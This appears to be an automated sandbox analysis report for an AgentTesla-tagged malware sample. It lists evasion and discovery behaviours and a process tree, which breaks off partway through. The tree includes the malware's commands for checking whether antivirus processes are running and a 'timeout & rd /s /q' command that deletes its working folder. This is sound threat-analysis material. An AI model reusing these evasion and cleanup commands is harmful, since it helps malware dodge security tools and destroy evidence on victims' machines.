agenttesla | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	game.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	game.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	game.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	New Text Document mod.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	231.tmp

Executes dropped EXE 14 IoCs

pid	Process
3548	66eb0d09c9f08_Gads.exe
3632	66eaf17e9bd9e_Softwarepaxck.exe
2256	game.exe
4024	66eaee5323f5d_setup3.exe
1756	MSYXH9ZYL05YS.exe
2640	231.exe
1792	231.tmp
3452	vfagms15.exe
4400	231.exe
4524	vsfdajg16.exe
3240	lnfsda.exe
4820	231.tmp
1468	vkfsags12.exe
3216	smdsg.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Wine	game.exe

Loads dropped DLL 2 IoCs

pid	Process
1792	231.tmp
4820	231.tmp

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
95	bitbucket.org
96	bitbucket.org

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral4/files/0x00090000000232f5-504.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 6 IoCs

discovery

Process Discovery

T1057

pid	Process
5060	tasklist.exe
4136	tasklist.exe
1828	tasklist.exe
5024	tasklist.exe
3192	tasklist.exe
3452	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2256	game.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 3548 set thread context of 1828	3548	66eb0d09c9f08_Gads.exe	100
PID 3632 set thread context of 4464	3632	66eaf17e9bd9e_Softwarepaxck.exe	106
PID 3452 set thread context of 672	3452	vfagms15.exe	120
PID 4524 set thread context of 4592	4524	vsfdajg16.exe	126

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\Application\MSYXH9ZYL05YS.exe	BitLockerToGo.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
2248	4024	WerFault.exe	102
5480	6128	WerFault.exe
5524	3688	WerFault.exe	174
5168	4892	WerFault.exe	225

System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	game.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSYXH9ZYL05YS.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vsfdajg16.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	231.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	66eb0d09c9f08_Gads.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	231.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	231.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	231.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	66eaee5323f5d_setup3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vfagms15.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	66eaf17e9bd9e_Softwarepaxck.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lnfsda.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vkfsags12.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	66eaee5323f5d_setup3.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	66eaee5323f5d_setup3.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	66eaee5323f5d_setup3.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4316	timeout.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2256	game.exe
2256	game.exe
672	RegAsm.exe
672	RegAsm.exe
4820	231.tmp
4820	231.tmp

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3476	New Text Document mod.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4820	231.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3476 wrote to memory of 3548	3476	New Text Document mod.exe	96
PID 3476 wrote to memory of 3548	3476	New Text Document mod.exe	96
PID 3476 wrote to memory of 3548	3476	New Text Document mod.exe	96
PID 3548 wrote to memory of 1828	3548	66eb0d09c9f08_Gads.exe	100
PID 3548 wrote to memory of 1828	3548	66eb0d09c9f08_Gads.exe	100
PID 3548 wrote to memory of 1828	3548	66eb0d09c9f08_Gads.exe	100
PID 3476 wrote to memory of 3632	3476	New Text Document mod.exe	99
PID 3476 wrote to memory of 3632	3476	New Text Document mod.exe	99
PID 3476 wrote to memory of 3632	3476	New Text Document mod.exe	99
PID 3548 wrote to memory of 1828	3548	66eb0d09c9f08_Gads.exe	100
PID 3476 wrote to memory of 2256	3476	New Text Document mod.exe	101
PID 3476 wrote to memory of 2256	3476	New Text Document mod.exe	101
PID 3476 wrote to memory of 2256	3476	New Text Document mod.exe	101
PID 3548 wrote to memory of 1828	3548	66eb0d09c9f08_Gads.exe	100
PID 3476 wrote to memory of 4024	3476	New Text Document mod.exe	102
PID 3476 wrote to memory of 4024	3476	New Text Document mod.exe	102
PID 3476 wrote to memory of 4024	3476	New Text Document mod.exe	102
PID 3548 wrote to memory of 1828	3548	66eb0d09c9f08_Gads.exe	100
PID 3548 wrote to memory of 1828	3548	66eb0d09c9f08_Gads.exe	100
PID 3548 wrote to memory of 1828	3548	66eb0d09c9f08_Gads.exe	100
PID 3548 wrote to memory of 1828	3548	66eb0d09c9f08_Gads.exe	100
PID 3632 wrote to memory of 4464	3632	66eaf17e9bd9e_Softwarepaxck.exe	106
PID 3632 wrote to memory of 4464	3632	66eaf17e9bd9e_Softwarepaxck.exe	106
PID 3632 wrote to memory of 4464	3632	66eaf17e9bd9e_Softwarepaxck.exe	106
PID 3632 wrote to memory of 4464	3632	66eaf17e9bd9e_Softwarepaxck.exe	106
PID 3632 wrote to memory of 4464	3632	66eaf17e9bd9e_Softwarepaxck.exe	106
PID 3632 wrote to memory of 4464	3632	66eaf17e9bd9e_Softwarepaxck.exe	106
PID 3632 wrote to memory of 4464	3632	66eaf17e9bd9e_Softwarepaxck.exe	106
PID 3632 wrote to memory of 4464	3632	66eaf17e9bd9e_Softwarepaxck.exe	106
PID 3632 wrote to memory of 4464	3632	66eaf17e9bd9e_Softwarepaxck.exe	106
PID 4464 wrote to memory of 1756	4464	BitLockerToGo.exe	109
PID 4464 wrote to memory of 1756	4464	BitLockerToGo.exe	109
PID 4464 wrote to memory of 1756	4464	BitLockerToGo.exe	109
PID 3476 wrote to memory of 2640	3476	New Text Document mod.exe	110
PID 3476 wrote to memory of 2640	3476	New Text Document mod.exe	110
PID 3476 wrote to memory of 2640	3476	New Text Document mod.exe	110
PID 2640 wrote to memory of 1792	2640	231.exe	111
PID 2640 wrote to memory of 1792	2640	231.exe	111
PID 2640 wrote to memory of 1792	2640	231.exe	111
PID 3476 wrote to memory of 3452	3476	New Text Document mod.exe	112
PID 3476 wrote to memory of 3452	3476	New Text Document mod.exe	112
PID 3476 wrote to memory of 3452	3476	New Text Document mod.exe	112
PID 1792 wrote to memory of 4400	1792	231.tmp	114
PID 1792 wrote to memory of 4400	1792	231.tmp	114
PID 1792 wrote to memory of 4400	1792	231.tmp	114
PID 3476 wrote to memory of 4524	3476	New Text Document mod.exe	115
PID 3476 wrote to memory of 4524	3476	New Text Document mod.exe	115
PID 3476 wrote to memory of 4524	3476	New Text Document mod.exe	115
PID 3476 wrote to memory of 3240	3476	New Text Document mod.exe	118
PID 3476 wrote to memory of 3240	3476	New Text Document mod.exe	118
PID 3476 wrote to memory of 3240	3476	New Text Document mod.exe	118
PID 4400 wrote to memory of 4820	4400	231.exe	117
PID 4400 wrote to memory of 4820	4400	231.exe	117
PID 4400 wrote to memory of 4820	4400	231.exe	117
PID 3452 wrote to memory of 672	3452	vfagms15.exe	120
PID 3452 wrote to memory of 672	3452	vfagms15.exe	120
PID 3452 wrote to memory of 672	3452	vfagms15.exe	120
PID 3452 wrote to memory of 672	3452	vfagms15.exe	120
PID 3452 wrote to memory of 672	3452	vfagms15.exe	120
PID 3452 wrote to memory of 672	3452	vfagms15.exe	120
PID 3452 wrote to memory of 672	3452	vfagms15.exe	120
PID 3452 wrote to memory of 672	3452	vfagms15.exe	120
PID 3452 wrote to memory of 672	3452	vfagms15.exe	120
PID 3452 wrote to memory of 672	3452	vfagms15.exe	120

C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3476
- C:\Users\Admin\AppData\Local\Temp\a\66eb0d09c9f08_Gads.exe
  "C:\Users\Admin\AppData\Local\Temp\a\66eb0d09c9f08_Gads.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3548
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1828
- C:\Users\Admin\AppData\Local\Temp\a\66eaf17e9bd9e_Softwarepaxck.exe
  "C:\Users\Admin\AppData\Local\Temp\a\66eaf17e9bd9e_Softwarepaxck.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3632
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    3⤵
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4464
  - - C:\Program Files\Google\Chrome\Application\MSYXH9ZYL05YS.exe
      "C:\Program Files\Google\Chrome\Application\MSYXH9ZYL05YS.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1756
- C:\Users\Admin\AppData\Local\Temp\a\game.exe
  "C:\Users\Admin\AppData\Local\Temp\a\game.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:2256
- C:\Users\Admin\AppData\Local\Temp\a\66eaee5323f5d_setup3.exe
  "C:\Users\Admin\AppData\Local\Temp\a\66eaee5323f5d_setup3.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Checks SCSI registry key(s)
  PID:4024
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4024 -s 352
    3⤵
    - Program crash
    PID:2248
- C:\Users\Admin\AppData\Local\Temp\a\231.exe
  "C:\Users\Admin\AppData\Local\Temp\a\231.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2640
- - C:\Users\Admin\AppData\Local\Temp\is-61SN8.tmp\231.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-61SN8.tmp\231.tmp" /SL5="$B01E8,10740751,812544,C:\Users\Admin\AppData\Local\Temp\a\231.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1792
  - - C:\Users\Admin\AppData\Local\Temp\a\231.exe
      "C:\Users\Admin\AppData\Local\Temp\a\231.exe" /VERYSILENT /NORESTART
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4400
    - - C:\Users\Admin\AppData\Local\Temp\is-VM3Q2.tmp\231.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-VM3Q2.tmp\231.tmp" /SL5="$E0046,10740751,812544,C:\Users\Admin\AppData\Local\Temp\a\231.exe" /VERYSILENT /NORESTART
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:4820
      - C:\Windows\system32\cmd.exe
        
        "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
        6⤵
        
        PID:4888
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
        7⤵
        Enumerates processes with tasklist
        
        PID:5024
        
        C:\Windows\system32\find.exe
        
        find /I "wrsa.exe"
        7⤵
        
        PID:2184
      - C:\Windows\system32\cmd.exe
        
        "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
        6⤵
        
        PID:932
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
        7⤵
        Enumerates processes with tasklist
        
        PID:3192
        
        C:\Windows\system32\find.exe
        
        find /I "opssvc.exe"
        7⤵
        
        PID:4404
      - C:\Windows\system32\cmd.exe
        
        "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
        6⤵
        
        PID:3704
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
        7⤵
        Enumerates processes with tasklist
        
        PID:3452
        
        C:\Windows\system32\find.exe
        
        find /I "avastui.exe"
        7⤵
        
        PID:452
      - C:\Windows\system32\cmd.exe
        
        "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
        6⤵
        
        PID:1468
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
        7⤵
        Enumerates processes with tasklist
        
        PID:5060
        
        C:\Windows\system32\find.exe
        
        find /I "avgui.exe"
        7⤵
        
        PID:3996
      - C:\Windows\system32\cmd.exe
        
        "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
        6⤵
        
        PID:3868
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
        7⤵
        Enumerates processes with tasklist
        
        PID:4136
        
        C:\Windows\system32\find.exe
        
        find /I "nswscsvc.exe"
        7⤵
        
        PID:1020
      - C:\Windows\system32\cmd.exe
        
        "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
        6⤵
        
        PID:2028
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
        7⤵
        Enumerates processes with tasklist
        
        PID:1828
        
        C:\Windows\system32\find.exe
        
        find /I "sophoshealth.exe"
        7⤵
        
        PID:1748
      - C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe
        
        "C:\Users\Admin\AppData\Local\acetiam\\AutoIt3.exe" "C:\Users\Admin\AppData\Local\acetiam\\grayhound1..a3x"
        6⤵
        
        PID:3292
- C:\Users\Admin\AppData\Local\Temp\a\vfagms15.exe
  "C:\Users\Admin\AppData\Local\Temp\a\vfagms15.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3452
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:672
  - - C:\ProgramData\KJEHDHIEGI.exe
      "C:\ProgramData\KJEHDHIEGI.exe"
      4⤵
      PID:5304
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GCBGCGHDGIEG" & exit
      4⤵
      PID:1980
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:4316
- C:\Users\Admin\AppData\Local\Temp\a\vsfdajg16.exe
  "C:\Users\Admin\AppData\Local\Temp\a\vsfdajg16.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:4524
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4928
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4592
- C:\Users\Admin\AppData\Local\Temp\a\lnfsda.exe
  "C:\Users\Admin\AppData\Local\Temp\a\lnfsda.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3240
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4088
- C:\Users\Admin\AppData\Local\Temp\a\vkfsags12.exe
  "C:\Users\Admin\AppData\Local\Temp\a\vkfsags12.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1468
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:1784
- C:\Users\Admin\AppData\Local\Temp\a\smdsg.exe
  "C:\Users\Admin\AppData\Local\Temp\a\smdsg.exe"
  2⤵
  - Executes dropped EXE
  PID:3216
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4864
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:2552
- C:\Users\Admin\AppData\Local\Temp\a\vlsadg.exe
  "C:\Users\Admin\AppData\Local\Temp\a\vlsadg.exe"
  2⤵
  PID:4240
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4704
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:1588
- C:\Users\Admin\AppData\Local\Temp\a\66ea645129e6a_jacobs.exe
  "C:\Users\Admin\AppData\Local\Temp\a\66ea645129e6a_jacobs.exe"
  2⤵
  PID:2248
- C:\Users\Admin\AppData\Local\Temp\a\onePackage.exe
  "C:\Users\Admin\AppData\Local\Temp\a\onePackage.exe"
  2⤵
  PID:3008
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    3⤵
    PID:5816
- C:\Users\Admin\AppData\Local\Temp\a\random.exe
  "C:\Users\Admin\AppData\Local\Temp\a\random.exe"
  2⤵
  PID:1344
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
    3⤵
    PID:4072
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
      4⤵
      PID:1312
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1976 -parentBuildID 20240401114208 -prefsHandle 1892 -prefMapHandle 1884 -prefsLen 23602 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2f075bff-db1c-4a70-a9f6-5697938f2b30} 1312 "\\.\pipe\gecko-crash-server-pipe.1312" gpu
        5⤵
        
        PID:2532
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2472 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2436 -prefsLen 24522 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b89f9c0a-3e13-4504-ba83-8715fc9ea13c} 1312 "\\.\pipe\gecko-crash-server-pipe.1312" socket
        5⤵
        
        PID:3580
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3136 -childID 1 -isForBrowser -prefsHandle 3024 -prefMapHandle 3084 -prefsLen 22590 -prefMapSize 244628 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {77dbfc76-1467-4211-b780-e632f6378a4a} 1312 "\\.\pipe\gecko-crash-server-pipe.1312" tab
        5⤵
        
        PID:4232
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3732 -childID 2 -isForBrowser -prefsHandle 3724 -prefMapHandle 3720 -prefsLen 29012 -prefMapSize 244628 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {51714a00-2aef-4bf7-b50a-e4420bfbc82f} 1312 "\\.\pipe\gecko-crash-server-pipe.1312" tab
        5⤵
        
        PID:4280
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4208 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4268 -prefMapHandle 4264 -prefsLen 29012 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {447c9228-3a6b-4bf3-bd84-261c1c8589be} 1312 "\\.\pipe\gecko-crash-server-pipe.1312" utility
        5⤵
        
        PID:5640
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5116 -childID 3 -isForBrowser -prefsHandle 5108 -prefMapHandle 5104 -prefsLen 26882 -prefMapSize 244628 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6bc0aeca-a2cb-4b04-b625-535c785a7430} 1312 "\\.\pipe\gecko-crash-server-pipe.1312" tab
        5⤵
        
        PID:5168
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5236 -childID 4 -isForBrowser -prefsHandle 5244 -prefMapHandle 5248 -prefsLen 26882 -prefMapSize 244628 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {87cb7854-1da0-4605-8d53-58d0583caac7} 1312 "\\.\pipe\gecko-crash-server-pipe.1312" tab
        5⤵
        
        PID:5180
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5452 -childID 5 -isForBrowser -prefsHandle 5460 -prefMapHandle 5464 -prefsLen 26882 -prefMapSize 244628 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {da58f470-4f12-4a9a-8a17-6e15f01f62a6} 1312 "\\.\pipe\gecko-crash-server-pipe.1312" tab
        5⤵
        
        PID:5196
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5376 -childID 6 -isForBrowser -prefsHandle 5224 -prefMapHandle 5400 -prefsLen 26989 -prefMapSize 244628 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5868b425-c587-4b19-aceb-420ac78b783c} 1312 "\\.\pipe\gecko-crash-server-pipe.1312" tab
        5⤵
        
        PID:5576
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5248 -childID 7 -isForBrowser -prefsHandle 5244 -prefMapHandle 5444 -prefsLen 26989 -prefMapSize 244628 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fe55c343-cdb9-4c18-a84d-2b39dd5380de} 1312 "\\.\pipe\gecko-crash-server-pipe.1312" tab
        5⤵
        
        PID:5600
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
    3⤵
    PID:5204
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
      4⤵
      PID:5252
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1016 -parentBuildID 20240401114208 -prefsHandle 944 -prefMapHandle 924 -prefsLen 17509 -prefMapSize 166559 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {54da0445-3962-4c3b-9943-aac0b1aacbb3} 5252 "\\.\pipe\gecko-crash-server-pipe.5252" socket
        5⤵
        
        PID:4084
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
    3⤵
    PID:2976
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
      4⤵
      PID:4108
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1940 -parentBuildID 20240401114208 -prefsHandle 1856 -prefMapHandle 1848 -prefsLen 23602 -prefMapSize 244680 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ba0a62fb-2605-449a-af94-b93539b0433b} 4108 "\\.\pipe\gecko-crash-server-pipe.4108" gpu
        5⤵
        
        PID:3452
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2400 -parentBuildID 20240401114208 -prefsHandle 2392 -prefMapHandle 2380 -prefsLen 24522 -prefMapSize 244680 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a73a9510-61c4-4152-a2cf-c430cdddd48a} 4108 "\\.\pipe\gecko-crash-server-pipe.4108" socket
        5⤵
        
        PID:5124
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
